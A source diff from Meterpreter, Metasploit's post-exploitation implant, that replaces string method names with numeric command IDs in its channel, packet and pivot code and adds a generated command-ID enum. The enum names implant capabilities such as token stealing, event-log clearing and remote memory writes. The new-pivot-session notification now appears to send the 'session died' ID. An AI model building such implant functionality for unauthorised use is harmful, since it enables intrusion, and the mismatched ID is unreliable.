@@ -394,17 +393,19 @@ DWORD _channel_packet_completion_routine(Remote *remote, Packet *packet,
 	DWORD res = ERROR_NOT_FOUND;
 
 
-	dprintf( "[CHANNEL] _channel_packet_completion_routine. channel=0x%08X method=%s", channel, method );
+	dprintf( "[CHANNEL] _channel_packet_completion_routine. channel=0x%08X commandId=%u", channel, commandId );
 
 	// If the channel was not found and it isn't an open request, return failure
-	if (!channel && strcmp(method, "core_channel_open"))
+	if (!channel && COMMAND_ID_CORE_CHANNEL_OPEN != commandId)
+	{
 		return ERROR_NOT_FOUND;
+	}
 
-	if ((!strcmp(method, "core_channel_open")) &&
+	if (COMMAND_ID_CORE_CHANNEL_OPEN == commandId && comp->routine.open)
-	    (comp->routine.open))
+	{
 		res = comp->routine.open(remote, channel, comp->context, result);
-	else if ((!strcmp(method, "core_channel_read")) &&
+	}
-	         (comp->routine.read))
+	else if (COMMAND_ID_CORE_CHANNEL_READ == commandId && comp->routine.read)
 	{
 		ULONG length = 0, realLength = 0;
 		PUCHAR buffer = NULL;
@@ -413,42 +414,42 @@ DWORD _channel_packet_completion_routine(Remote *remote, Packet *packet,
 		length = packet_get_tlv_value_uint(packet, TLV_TYPE_LENGTH);
 
 		// Allocate storage for it
-		if ((length) && (buffer = (PUCHAR)malloc(length)))
+		if (length && (buffer = (PUCHAR)malloc(length)))
 		{
 			memset(buffer, 0, length);
 
 			channel_read_from_buffered(channel, buffer, length, &realLength);
 		}
 
-		res = comp->routine.read(remote, channel, comp->context, result,
+		res = comp->routine.read(remote, channel, comp->context, result, buffer, realLength);
-				buffer, realLength);
 
 		if (buffer)
+		{
 			free(buffer);
+		}
 	}
-	else if ((!strcmp(method, "core_channel_write")) &&
+	else if (COMMAND_ID_CORE_CHANNEL_WRITE == commandId && comp->routine.write)
-	         (comp->routine.write))
 	{
 		Tlv lengthTlv;
 		ULONG length = 0;
 
 		// Get the number of bytes written to the channel
-		if ((packet_get_tlv(packet, TLV_TYPE_LENGTH, &lengthTlv)
+		if ((packet_get_tlv(packet, TLV_TYPE_LENGTH, &lengthTlv) == ERROR_SUCCESS) && (lengthTlv.header.length >= sizeof(DWORD)))
-				== ERROR_SUCCESS) &&
+		{
-		    (lengthTlv.header.length >= sizeof(DWORD)))
 			length = ntohl(*(LPDWORD)lengthTlv.buffer);
+		}
 
-		res = comp->routine.write(remote, channel, comp->context, result,
+		res = comp->routine.write(remote, channel, comp->context, result, length);
-				length);
 	}
-	else if ((!strcmp(method, "core_channel_close")) &&
+	else if (COMMAND_ID_CORE_CHANNEL_CLOSE == commandId && comp->routine.close)
-	         (comp->routine.close)) {
+	{
 		dprintf( "[CHANNEL] freeing up the completion context" );
 		res = comp->routine.close(remote, channel, comp->context, result);
 	}
-	else if ((!strcmp(method, "core_channel_interact")) &&
+	else if (COMMAND_ID_CORE_CHANNEL_INTERACT == commandId && comp->routine.interact)
-	         (comp->routine.interact))
+	{
 		res = comp->routine.interact(remote, channel, comp->context, result);
+	}
 
 	// Deallocate the completion context
 	dprintf( "[CHANNEL] freeing up the completion context" );
@@ -464,16 +465,13 @@ DWORD _channel_packet_completion_routine(Remote *remote, Packet *packet,
 DWORD channel_open(Remote *remote, Tlv *addend, DWORD addendLength, ChannelCompletionRoutine *completionRoutine)
 {
 	PacketRequestCompletion requestCompletion, *realRequestCompletion = NULL;
-	ChannelCompletionRoutine *dupe = NULL;
 	DWORD res = ERROR_SUCCESS;
-	PCHAR method = "core_channel_open";
+	Tlv commandIdTlv;
-	Packet *request;
-	Tlv methodTlv;
 
 	do
 	{
-		// Allocate the request
+		Packet* request = packet_create(PACKET_TLV_TYPE_REQUEST, 0);
-		if (!(request = packet_create(PACKET_TLV_TYPE_REQUEST, NULL)))
+		if (request == NULL)
 		{
 			res = ERROR_NOT_ENOUGH_MEMORY;
 			break;
@@ -483,18 +481,16 @@ DWORD channel_open(Remote *remote, Tlv *addend, DWORD addendLength, ChannelCompl
 		packet_add_tlvs(request, addend, addendLength);
 
 		// If no method TLV as added, add the default one.
-		if (packet_get_tlv(request, TLV_TYPE_METHOD, &methodTlv) != ERROR_SUCCESS)
+		if (packet_get_tlv(request, TLV_TYPE_COMMAND_ID, &commandIdTlv) != ERROR_SUCCESS)
 		{
-			packet_add_tlv_string(request, TLV_TYPE_METHOD, method);
+			packet_add_tlv_uint(request, TLV_TYPE_COMMAND_ID, COMMAND_ID_CORE_CHANNEL_OPEN);
 		}
 
 		// Initialize the packet completion routine
 		if (completionRoutine)
 		{
 			// Duplicate the completion routine
-			dupe = channel_duplicate_completion_routine(completionRoutine);
+			requestCompletion.context = channel_duplicate_completion_routine(completionRoutine);
-
-			requestCompletion.context = dupe;
 			requestCompletion.routine = _channel_packet_completion_routine;
 			realRequestCompletion = &requestCompletion;
 		}
@@ -511,20 +507,16 @@ DWORD channel_open(Remote *remote, Tlv *addend, DWORD addendLength, ChannelCompl
  * Read data from the remote end of the channel.
  */
 DWORD channel_read(Channel *channel, Remote *remote, Tlv *addend,
-	DWORD addendLength, ULONG length,
+	DWORD addendLength, ULONG length, ChannelCompletionRoutine *completionRoutine)
-	ChannelCompletionRoutine *completionRoutine)
 {
 	PacketRequestCompletion requestCompletion, *realRequestCompletion = NULL;
-	ChannelCompletionRoutine *dupe = NULL;
-	Packet *request;
 	DWORD res = ERROR_SUCCESS;
-	PCHAR method = "core_channel_read";
+	Tlv commandIdTlv;
-	Tlv methodTlv;
 
 	do
 	{
-		// Allocate an empty request
+		Packet* request= packet_create(PACKET_TLV_TYPE_REQUEST, 0);
-		if (!(request = packet_create(PACKET_TLV_TYPE_REQUEST, NULL)))
+		if (request == NULL)
 		{
 			res = ERROR_NOT_ENOUGH_MEMORY;
 			break;
@@ -534,9 +526,9 @@ DWORD channel_read(Channel *channel, Remote *remote, Tlv *addend,
 		packet_add_tlvs(request, addend, addendLength);
 
 		// If no method TLV as added, add the default one.
-		if (packet_get_tlv(request, TLV_TYPE_METHOD, &methodTlv) != ERROR_SUCCESS)
+		if (packet_get_tlv(request, TLV_TYPE_COMMAND_ID, &commandIdTlv) != ERROR_SUCCESS)
 		{
-			packet_add_tlv_string(request, TLV_TYPE_METHOD, method);
+			packet_add_tlv_uint(request, TLV_TYPE_COMMAND_ID, COMMAND_ID_CORE_CHANNEL_READ);
 		}
 
 		// Add the channel identifier and the length to read
@@ -547,9 +539,7 @@ DWORD channel_read(Channel *channel, Remote *remote, Tlv *addend,
 		if (completionRoutine)
 		{
 			// Duplicate the completion routine
-			dupe = channel_duplicate_completion_routine(completionRoutine);
+			requestCompletion.context = channel_duplicate_completion_routine(completionRoutine);
-
-			requestCompletion.context = dupe;
 			requestCompletion.routine = _channel_packet_completion_routine;
 			realRequestCompletion = &requestCompletion;
 		}
@@ -565,33 +555,35 @@ DWORD channel_read(Channel *channel, Remote *remote, Tlv *addend,
 /*
  * Write to the remote end of the channel
  */
-DWORD channel_write(Channel *channel, Remote *remote, Tlv *addend,
+DWORD channel_write(Channel *channel, Remote *remote, Tlv *addend, DWORD addendLength, PUCHAR buffer, ULONG length, ChannelCompletionRoutine *completionRoutine)
-	DWORD addendLength, PUCHAR buffer, ULONG length,
-	ChannelCompletionRoutine *completionRoutine)
 {
 	PacketRequestCompletion requestCompletion, *realRequestCompletion = NULL;
-	ChannelCompletionRoutine *dupe = NULL;
 	DWORD res = ERROR_SUCCESS;
-	LPCSTR method = "core_channel_write";
+	Tlv commandIdTlv;
-	Packet *request;
-	Tlv methodTlv;
 
 	do
 	{
-		// Allocate a request packet
+		Packet *request = packet_create(PACKET_TLV_TYPE_REQUEST, 0);
-		if (!(request = packet_create(PACKET_TLV_TYPE_REQUEST, NULL)))
+		if (request == NULL)
 		{
 			res = ERROR_NOT_ENOUGH_MEMORY;
 			break;
 		}
 
+		dprintf("[CHANNEL] channel_write: adding TLVs");
+
 		// Add the supplied TLVs
 		packet_add_tlvs(request, addend, addendLength);
 
 		// If no method TLV as added, add the default one.
-		if (packet_get_tlv(request, TLV_TYPE_METHOD, &methodTlv) != ERROR_SUCCESS)
+		if (packet_get_tlv(request, TLV_TYPE_COMMAND_ID, &commandIdTlv) != ERROR_SUCCESS)
 		{
-			packet_add_tlv_string(request, TLV_TYPE_METHOD, method);
+			dprintf("[CHANNEL] channel_write: adding command id of %u", COMMAND_ID_CORE_CHANNEL_WRITE);
+			packet_add_tlv_uint(request, TLV_TYPE_COMMAND_ID, COMMAND_ID_CORE_CHANNEL_WRITE);
+		}
+		else
+		{
+			dprintf("[CHANNEL] channel_write: apparently already have a command ID of %u", packet_get_tlv_value_uint(request, TLV_TYPE_COMMAND_ID));
 		}
 
 		// Add the channel identifier and the length to write
@@ -613,9 +605,7 @@ DWORD channel_write(Channel *channel, Remote *remote, Tlv *addend,
 		if (completionRoutine)
 		{
 			// Duplicate the completion routine
-			dupe = channel_duplicate_completion_routine(completionRoutine);
+			requestCompletion.context = channel_duplicate_completion_routine(completionRoutine);
-
-			requestCompletion.context = dupe;
 			requestCompletion.routine = _channel_packet_completion_routine;
 			realRequestCompletion = &requestCompletion;
 		}
@@ -635,15 +625,13 @@ DWORD channel_close(Channel *channel, Remote *remote, Tlv *addend,
 	DWORD addendLength, ChannelCompletionRoutine *completionRoutine)
 {
 	PacketRequestCompletion requestCompletion, *realRequestCompletion = NULL;
-	ChannelCompletionRoutine *dupe = NULL;
-	LPCSTR method = "core_channel_close";
 	DWORD res = ERROR_SUCCESS;
-	Packet *request;
+	Tlv commandIdTlv;
-	Tlv methodTlv;
 
 	do
 	{
-		if (!(request = packet_create(PACKET_TLV_TYPE_REQUEST, NULL)))
+		Packet *request = packet_create(PACKET_TLV_TYPE_REQUEST, 0);
+		if (request == NULL)
 		{
 			res = ERROR_NOT_ENOUGH_MEMORY;
 			break;
@@ -653,9 +641,9 @@ DWORD channel_close(Channel *channel, Remote *remote, Tlv *addend,
 		packet_add_tlvs(request, addend, addendLength);
 
 		// If no method TLV as added, add the default one.
-		if (packet_get_tlv(request, TLV_TYPE_METHOD, &methodTlv) != ERROR_SUCCESS)
+		if (packet_get_tlv(request, TLV_TYPE_COMMAND_ID, &commandIdTlv) != ERROR_SUCCESS)
 		{
-			packet_add_tlv_string(request, TLV_TYPE_METHOD, method);
+			packet_add_tlv_uint(request, TLV_TYPE_COMMAND_ID, COMMAND_ID_CORE_CHANNEL_CLOSE);
 		}
 
 		// Add the channel identifier
@@ -665,9 +653,7 @@ DWORD channel_close(Channel *channel, Remote *remote, Tlv *addend,
 		if (completionRoutine)
 		{
 			// Duplicate the completion routine
-			dupe = channel_duplicate_completion_routine(completionRoutine);
+			requestCompletion.context = channel_duplicate_completion_routine(completionRoutine);
-
-			requestCompletion.context = dupe;
 			requestCompletion.routine = _channel_packet_completion_routine;
 			realRequestCompletion = &requestCompletion;
 		}
@@ -687,19 +673,16 @@ DWORD channel_close(Channel *channel, Remote *remote, Tlv *addend,
  * forwarded in real time rather than being polled.
  */
 DWORD channel_interact(Channel *channel, Remote *remote, Tlv *addend,
-	DWORD addendLength, BOOL enable,
+	DWORD addendLength, BOOL enable, ChannelCompletionRoutine *completionRoutine)
-	ChannelCompletionRoutine *completionRoutine)
 {
 	PacketRequestCompletion requestCompletion, *realRequestCompletion = NULL;
-	ChannelCompletionRoutine *dupe = NULL;
-	LPCSTR method = "core_channel_interact";
 	DWORD res = ERROR_SUCCESS;
-	Packet *request;
+	Tlv commandIdTlv;
-	Tlv methodTlv;
 
 	do
 	{
-		if (!(request = packet_create(PACKET_TLV_TYPE_REQUEST, NULL)))
+		Packet* request = packet_create(PACKET_TLV_TYPE_REQUEST, 0);
+		if (request == NULL)
 		{
 			res = ERROR_NOT_ENOUGH_MEMORY;
 			break;
@@ -709,9 +692,9 @@ DWORD channel_interact(Channel *channel, Remote *remote, Tlv *addend,
 		packet_add_tlvs(request, addend, addendLength);
 
 		// If no method TLV as added, add the default one.
-		if (packet_get_tlv(request, TLV_TYPE_METHOD, &methodTlv) != ERROR_SUCCESS)
+		if (packet_get_tlv(request, TLV_TYPE_COMMAND_ID, &commandIdTlv) != ERROR_SUCCESS)
 		{
-			packet_add_tlv_string(request, TLV_TYPE_METHOD, method);
+			packet_add_tlv_uint(request, TLV_TYPE_COMMAND_ID, COMMAND_ID_CORE_CHANNEL_INTERACT);
 		}
 
 		// Add the channel identifier
@@ -724,9 +707,7 @@ DWORD channel_interact(Channel *channel, Remote *remote, Tlv *addend,
 		if (completionRoutine)
 		{
 			// Duplicate the completion routine
-			dupe = channel_duplicate_completion_routine(completionRoutine);
+			requestCompletion.context = channel_duplicate_completion_routine(completionRoutine);
-
-			requestCompletion.context = dupe;
 			requestCompletion.routine = _channel_packet_completion_routine;
 			realRequestCompletion = &requestCompletion;
 		}

c/meterpreter/source/metsrv/core.c

@@ -9,8 +9,7 @@
 #include "packet_encryption.h"
 #include <winhttp.h>
 
-DWORD packet_find_tlv_buf(Packet *packet, PUCHAR payload, DWORD payloadLength, DWORD index,
+DWORD packet_find_tlv_buf(Packet *packet, PUCHAR payload, DWORD payloadLength, DWORD index, TlvType type, Tlv *tlv);
-		TlvType type, Tlv *tlv);
 
 /*! @brief List element that contains packet completion routine details. */
 typedef struct _PacketCompletionRoutineEntry
@@ -133,10 +132,10 @@ VOID core_update_desktop(Remote * remote, DWORD dwSessionID, char * cpStationNam
 /*!
  * @brief Create a packet of a given type (request/response) and method.
  * @param type The TLV type that this packet represents.
- * @param method TLV method type (can be \c NULL).
+ * @param commandId TLV command Id 
  * @return Pointer to the newly created \c Packet.
  */
-Packet *packet_create(PacketTlvType type, LPCSTR method)
+Packet* packet_create(PacketTlvType type, UINT commandId)
 {
 	Packet *packet = NULL;
 	BOOL success = FALSE;
@@ -158,8 +157,7 @@ Packet *packet_create(PacketTlvType type, LPCSTR method)
 		packet->payload = NULL;
 		packet->payloadLength = 0;
 
-		// Add the method TLV if provided
+		if (commandId > 0 && packet_add_tlv_uint(packet, TLV_TYPE_COMMAND_ID, commandId) != ERROR_SUCCESS)
-		if (method && packet_add_tlv_string(packet, TLV_TYPE_METHOD, method) != ERROR_SUCCESS)
 		{
 			break;
 		}
@@ -242,7 +240,7 @@ DWORD packet_add_group(Packet* packet, TlvType type, Packet* groupPacket)
 Packet *packet_create_response(Packet *request)
 {
 	Packet *response = NULL;
-	Tlv method, requestId;
+	Tlv requestId;
 	BOOL success = FALSE;
 	PacketTlvType responseType;
 
@@ -255,17 +253,18 @@ Packet *packet_create_response(Packet *request)
 		responseType = PACKET_TLV_TYPE_RESPONSE;
 	}
 
+	UINT commandId = packet_get_tlv_value_uint(request, TLV_TYPE_COMMAND_ID);
+
 	do
 	{
-		// Get the request TLV's method
+		if (commandId == 0)
-		if (packet_get_tlv_string(request, TLV_TYPE_METHOD, &method) != ERROR_SUCCESS)
 		{
-			vdprintf("[PKT] Can't find method");
+			vdprintf("[PKT] Can't find command ID");
 			break;
 		}
 
 		// Try to allocate a response packet
-		if (!(response = packet_create(responseType, (PCHAR)method.buffer)))
+		if (!(response = packet_create(responseType, commandId)))
 		{
 			vdprintf("[PKT] Can't create response");
 			break;
@@ -1156,14 +1155,9 @@ DWORD packet_call_completion_handlers( Remote *remote, Packet *response, LPCSTR
 	PacketCompletionRoutineEntry *current;
 	DWORD result = packet_get_tlv_value_uint(response, TLV_TYPE_RESULT);
 	DWORD matches = 0;
-	Tlv methodTlv;
-	LPCSTR method = NULL;
 
-	// Get the method associated with this packet
+	// Get the command associated with this packet
-	if (packet_get_tlv_string(response, TLV_TYPE_METHOD, &methodTlv) == ERROR_SUCCESS)
+	UINT commandId = packet_get_tlv_value_uint(response, TLV_TYPE_COMMAND_ID);
-	{
-		method = (LPCSTR)methodTlv.buffer;
-	}
 
 	// Enumerate the completion routine list
 	for (current = packetCompletionRoutineList; current; current = current->next)
@@ -1176,7 +1170,7 @@ DWORD packet_call_completion_handlers( Remote *remote, Packet *response, LPCSTR
 		}
 
 		// Call the completion routine
-		current->handler.routine(remote, response, current->handler.context, method, result);
+		current->handler.routine(remote, response, current->handler.context, commandId, result);
 
 		// Increment the number of matched handlers
 		matches++;
@@ -1309,20 +1303,15 @@ DWORD packet_transmit(Remote* remote, Packet* packet, PacketRequestCompletion* c
 	{
 		// If a completion routine was supplied and the packet has a request
 		// identifier, insert the completion routine into the list
-		if ((completion) &&
+		if ((completion) && (packet_get_tlv_string(packet, TLV_TYPE_REQUEST_ID, &requestId) == ERROR_SUCCESS))
-			(packet_get_tlv_string(packet, TLV_TYPE_REQUEST_ID,
-			&requestId) == ERROR_SUCCESS))
 		{
 			packet_add_completion_handler((LPCSTR)requestId.buffer, completion);
 		}
 
 		encrypt_packet(remote, packet, &encryptedPacket, &encryptedPacketLength);
-		dprintf("[PACKET] Sending packet to remote, length: %u", encryptedPacketLength);
+		dprintf("[PACKET] Sending packet to remote, length: %u, command id: %u", encryptedPacketLength, packet_get_tlv_value_uint(packet, TLV_TYPE_COMMAND_ID));
-
-		dprintf("[PACKET] Remote: %p", remote);
-		dprintf("[PACKET] Transport: %p", remote->transport);
-		dprintf("[PACKET] Packet Transmit: %p", remote->transport->packet_transmit);
 		SetLastError(remote->transport->packet_transmit(remote, encryptedPacket, encryptedPacketLength));
+		dprintf("[PACKET] Sent packet to remote, length: %u, command id: %u, result: %u", encryptedPacketLength, packet_get_tlv_value_uint(packet, TLV_TYPE_COMMAND_ID), GetLastError());
 	} while (0);
 
 	res = GetLastError();

c/meterpreter/source/metsrv/core.h

@@ -14,7 +14,7 @@
 /*
  * Packet manipulation
  */
-Packet *packet_create(PacketTlvType type, LPCSTR method);
+Packet* packet_create(PacketTlvType type, UINT commandId);
 Packet *packet_create_response(Packet *packet);
 Packet* packet_create_group();
 Packet *packet_duplicate(Packet *packet);

c/meterpreter/source/metsrv/metsrv.h

@@ -54,7 +54,7 @@ DWORD server_setup(MetsrvConfig* config);
 typedef DWORD (*PSRVINIT)(MetApi* api, Remote *remote);
 typedef DWORD (*PSRVDEINIT)(Remote *remote);
 typedef DWORD (*PSRVGETNAME)(char* buffer, int bufferSize);
-typedef VOID (*PCMDADDED)(const char* commandName);
+typedef VOID (*PCMDADDED)(UINT command_id);
 typedef DWORD (*PSTAGELESSINIT)(LPBYTE data, DWORD dataSize);
 
 typedef struct _EXTENSION

c/meterpreter/source/metsrv/remote_dispatch.c

@@ -22,15 +22,15 @@ BOOL request_core_patch_url(Remote* remote, Packet* packet, DWORD* result);
 // Dispatch table
 Command customCommands[] =
 {
-	COMMAND_REQ("core_loadlib", request_core_loadlib),
+	COMMAND_REQ(COMMAND_ID_CORE_LOADLIB, request_core_loadlib),
-	COMMAND_REQ("core_enumextcmd", request_core_enumextcmd),
+	COMMAND_REQ(COMMAND_ID_CORE_ENUMEXTCMD, request_core_enumextcmd),
-	COMMAND_REQ("core_machine_id", request_core_machine_id),
+	COMMAND_REQ(COMMAND_ID_CORE_MACHINE_ID, request_core_machine_id),
-	COMMAND_REQ("core_get_session_guid", request_core_get_session_guid),
+	COMMAND_REQ(COMMAND_ID_CORE_GET_SESSION_GUID, request_core_get_session_guid),
-	COMMAND_REQ("core_set_session_guid", request_core_set_session_guid),
+	COMMAND_REQ(COMMAND_ID_CORE_SET_SESSION_GUID, request_core_set_session_guid),
-	COMMAND_REQ("core_set_uuid", request_core_set_uuid),
+	COMMAND_REQ(COMMAND_ID_CORE_SET_UUID, request_core_set_uuid),
-	COMMAND_REQ("core_pivot_add", request_core_pivot_add),
+	COMMAND_REQ(COMMAND_ID_CORE_PIVOT_ADD, request_core_pivot_add),
-	COMMAND_REQ("core_pivot_remove", request_core_pivot_remove),
+	COMMAND_REQ(COMMAND_ID_CORE_PIVOT_REMOVE, request_core_pivot_remove),
-	COMMAND_INLINE_REP("core_patch_url", request_core_patch_url),
+	COMMAND_INLINE_REP(COMMAND_ID_CORE_PATCH_URL, request_core_patch_url),
 	COMMAND_TERMINATOR
 };
 
@@ -92,7 +92,7 @@ BOOL ext_cmd_callback(LPVOID pState, LPVOID pData)
 			dprintf("[LISTEXT] Found extension: %s", pExt->name);
 			for (command = pExt->start; command != pExt->end; command = command->next)
 			{
-				packet_add_tlv_string(pEnum->pResponse, TLV_TYPE_STRING, command->method);
+				packet_add_tlv_uint(pEnum->pResponse, TLV_TYPE_UINT, command->command_id);
 			}
 			dprintf("[LISTEXT] Finished listing extension: %s", pExt->name);
 
@@ -261,7 +261,7 @@ DWORD load_extension(HMODULE hLibrary, BOOL bLibLoadedReflectivly, Remote* remot
 				{
 					for (Command* command = pExtension->end; command != NULL; command = command->next)
 					{
-						pExtension->commandAdded(command->method);
+						pExtension->commandAdded(command->command_id);
 					}
 				}
 
@@ -283,7 +283,8 @@ DWORD load_extension(HMODULE hLibrary, BOOL bLibLoadedReflectivly, Remote* remot
 		{
 			for (Command* command = pExtension->start; command != pExtension->end; command = command->next)
 			{
-				packet_add_tlv_string(response, TLV_TYPE_METHOD, command->method);
+				dprintf("[LOAD EXTENSION] Adding command ID to response: %u", command->command_id);
+				packet_add_tlv_uint(response, TLV_TYPE_UINT, command->command_id);
 
 				// inform existing extensions of the new commands
 				for (PNODE node = gExtensionList->start; node != NULL; node = node->next)
@@ -292,7 +293,7 @@ DWORD load_extension(HMODULE hLibrary, BOOL bLibLoadedReflectivly, Remote* remot
 					// don't inform the extension of itself
 					if (ext != pExtension && ext->commandAdded)
 					{
-						ext->commandAdded(command->method);
+						ext->commandAdded(command->command_id);
 					}
 				}
 			}

c/meterpreter/source/metsrv/server_pivot_named_pipe.c

@@ -211,7 +211,7 @@ static DWORD read_pipe_to_packet(NamedPipeContext* ctx, LPBYTE source, DWORD sou
 
 					// with the session now established, we need to inform metasploit of the new connection
 					dprintf("[PIPE] Informing MSF of the new named pipe pivot");
-					Packet* notification = packet_create(PACKET_TLV_TYPE_REQUEST, "core_pivot_session_new");
+					Packet* notification = packet_create(PACKET_TLV_TYPE_REQUEST, COMMAND_ID_CORE_PIVOT_SESSION_DIED);
 					packet_add_tlv_raw(notification, TLV_TYPE_SESSION_GUID, (LPVOID)&ctx->pivot_session_guid, sizeof(ctx->pivot_session_guid));
 					packet_add_tlv_raw(notification, TLV_TYPE_PIVOT_ID, (LPVOID)&ctx->pivot_id, sizeof(ctx->pivot_id));
 					packet_transmit(ctx->remote, notification, NULL);
@@ -563,7 +563,7 @@ static DWORD server_notify(Remote* remote, LPVOID entryContext, LPVOID threadCon
 				ResetEvent(serverCtx->read_overlap.hEvent);
 
 				// Prepare the notification packet for dispatching
-				Packet* notification = packet_create(PACKET_TLV_TYPE_REQUEST, "core_pivot_session_died");
+				Packet* notification = packet_create(PACKET_TLV_TYPE_REQUEST, COMMAND_ID_CORE_PIVOT_SESSION_DIED);
 				packet_add_tlv_raw(notification, TLV_TYPE_SESSION_GUID, (LPVOID)&serverCtx->pivot_session_guid, sizeof(serverCtx->pivot_session_guid));
 
 				// Clean up the pivot context
@@ -646,7 +646,7 @@ static DWORD server_notify(Remote* remote, LPVOID entryContext, LPVOID threadCon
 			// session that's come back out of nowhere (transport switching, sleeping, etc). Create a packet
 			// that will request the guid, and track a random request ID to find the response later on.
 			dprintf("[NP-SERVER] Creating the guid request packet");
-			Packet* getGuidPacket = packet_create(PACKET_TLV_TYPE_REQUEST, "core_get_session_guid");
+			Packet* getGuidPacket = packet_create(PACKET_TLV_TYPE_REQUEST, COMMAND_ID_CORE_GET_SESSION_GUID);
 			dprintf("[NP-SERVER] adding the request ID to the guid request packet");
 			packet_add_request_id(getGuidPacket);
 			CHAR* requestId = packet_get_tlv_value_string(getGuidPacket, TLV_TYPE_REQUEST_ID);

c/meterpreter/workspace/meterpreter.sln

@@ -52,6 +52,22 @@ Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ext_server_unhook", "ext_se
 EndProject
 Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "jpeg", "jpeg\jpeg.vcxproj", "{E61592E1-28F4-4AFC-9EE1-9BE833A061C1}"
 EndProject
+Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "Common", "Common", "{EDE086F4-77A8-452B-A189-708B55F625F4}"
+	ProjectSection(SolutionItems) = preProject
+		..\source\common\common.h = ..\source\common\common.h
+		..\source\common\common_base.h = ..\source\common\common_base.h
+		..\source\common\common_channel.h = ..\source\common\common_channel.h
+		..\source\common\common_command_ids.h = ..\source\common\common_command_ids.h
+		..\source\common\common_config.h = ..\source\common\common_config.h
+		..\source\common\common_core.h = ..\source\common\common_core.h
+		..\source\common\common_list.h = ..\source\common\common_list.h
+		..\source\common\common_metapi.h = ..\source\common\common_metapi.h
+		..\source\common\common_pivot_tree.h = ..\source\common\common_pivot_tree.h
+		..\source\common\common_remote.h = ..\source\common\common_remote.h
+		..\source\common\common_scheduler.h = ..\source\common\common_scheduler.h
+		..\source\common\common_thread.h = ..\source\common\common_thread.h
+	EndProjectSection
+EndProject
 Global
 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
 		r7_release|Win32 = r7_release|Win32

powershell/MSF.Powershell/MSF.Powershell.csproj

@@ -39,6 +39,7 @@
     </Reference>
   </ItemGroup>
   <ItemGroup>
+    <Compile Include="Meterpreter\CommandId.cs" />
     <Compile Include="Meterpreter\Elevate.cs" />
     <Compile Include="Meterpreter\Enumerations.cs" />
     <Compile Include="Meterpreter\Core.cs" />

powershell/MSF.Powershell/MSF.PowershellTester/Program.cs

@@ -19,8 +19,9 @@ namespace MSF.PowershellTester
             t.Pack(TlvType.ElevateTechnique, 1);
             t.Pack(TlvType.ElevateServiceName, "abcd1234");
 
-            var x = t.ToRequest("priv_elevate_getsystem");
+            var x = t.ToRequest(CommandId.PrivElevateGetsystem);
             var y = 0;
+            y++;
         }
     }
 }

powershell/MSF.Powershell/Meterpreter/CommandId.cs

@@ -0,0 +1,213 @@
+/// <summary>
+// This content was generated by a tool @ 2020-04-27 06:12:59 UTC
+/// </summary>
+namespace MSF.Powershell.Meterpreter
+{
+    public enum CommandId
+    {
+        CoreChannelClose = 1,
+        CoreChannelEof = 2,
+        CoreChannelInteract = 3,
+        CoreChannelOpen = 4,
+        CoreChannelRead = 5,
+        CoreChannelSeek = 6,
+        CoreChannelTell = 7,
+        CoreChannelWrite = 8,
+        CoreConsoleWrite = 9,
+        CoreEnumextcmd = 10,
+        CoreGetSessionGuid = 11,
+        CoreLoadlib = 12,
+        CoreMachineId = 13,
+        CoreMigrate = 14,
+        CoreNativeArch = 15,
+        CoreNegotiateTlvEncryption = 16,
+        CorePatchUrl = 17,
+        CorePivotAdd = 18,
+        CorePivotRemove = 19,
+        CorePivotSessionDied = 20,
+        CoreSetSessionGuid = 21,
+        CoreSetUuid = 22,
+        CoreShutdown = 23,
+        CoreTransportAdd = 24,
+        CoreTransportChange = 25,
+        CoreTransportGetcerthash = 26,
+        CoreTransportList = 27,
+        CoreTransportNext = 28,
+        CoreTransportPrev = 29,
+        CoreTransportRemove = 30,
+        CoreTransportSetcerthash = 31,
+        CoreTransportSetTimeouts = 32,
+        CoreTransportSleep = 33,
+        StdapiFsChdir = 1001,
+        StdapiFsChmod = 1002,
+        StdapiFsDeleteDir = 1003,
+        StdapiFsDeleteFile = 1004,
+        StdapiFsFileCopy = 1005,
+        StdapiFsFileExpandPath = 1006,
+        StdapiFsFileMove = 1007,
+        StdapiFsGetwd = 1008,
+        StdapiFsLs = 1009,
+        StdapiFsMd5 = 1010,
+        StdapiFsMkdir = 1011,
+        StdapiFsMountShow = 1012,
+        StdapiFsSearch = 1013,
+        StdapiFsSeparator = 1014,
+        StdapiFsSha1 = 1015,
+        StdapiFsStat = 1016,
+        StdapiNetConfigAddRoute = 1017,
+        StdapiNetConfigGetArpTable = 1018,
+        StdapiNetConfigGetInterfaces = 1019,
+        StdapiNetConfigGetNetstat = 1020,
+        StdapiNetConfigGetProxy = 1021,
+        StdapiNetConfigGetRoutes = 1022,
+        StdapiNetConfigRemoveRoute = 1023,
+        StdapiNetResolveHost = 1024,
+        StdapiNetResolveHosts = 1025,
+        StdapiNetSocketTcpShutdown = 1026,
+        StdapiNetTcpChannelOpen = 1027,
+        StdapiRailgunApi = 1028,
+        StdapiRailgunApiMulti = 1029,
+        StdapiRailgunMemread = 1030,
+        StdapiRailgunMemwrite = 1031,
+        StdapiRegistryCheckKeyExists = 1032,
+        StdapiRegistryCloseKey = 1033,
+        StdapiRegistryCreateKey = 1034,
+        StdapiRegistryDeleteKey = 1035,
+        StdapiRegistryDeleteValue = 1036,
+        StdapiRegistryEnumKey = 1037,
+        StdapiRegistryEnumKeyDirect = 1038,
+        StdapiRegistryEnumValue = 1039,
+        StdapiRegistryEnumValueDirect = 1040,
+        StdapiRegistryLoadKey = 1041,
+        StdapiRegistryOpenKey = 1042,
+        StdapiRegistryOpenRemoteKey = 1043,
+        StdapiRegistryQueryClass = 1044,
+        StdapiRegistryQueryValue = 1045,
+        StdapiRegistryQueryValueDirect = 1046,
+        StdapiRegistrySetValue = 1047,
+        StdapiRegistrySetValueDirect = 1048,
+        StdapiRegistryUnloadKey = 1049,
+        StdapiSysConfigDriverList = 1050,
+        StdapiSysConfigDropToken = 1051,
+        StdapiSysConfigGetenv = 1052,
+        StdapiSysConfigGetprivs = 1053,
+        StdapiSysConfigGetsid = 1054,
+        StdapiSysConfigGetuid = 1055,
+        StdapiSysConfigLocaltime = 1056,
+        StdapiSysConfigRev2self = 1057,
+        StdapiSysConfigStealToken = 1058,
+        StdapiSysConfigSysinfo = 1059,
+        StdapiSysEventlogClear = 1060,
+        StdapiSysEventlogClose = 1061,
+        StdapiSysEventlogNumrecords = 1062,
+        StdapiSysEventlogOldest = 1063,
+        StdapiSysEventlogOpen = 1064,
+        StdapiSysEventlogRead = 1065,
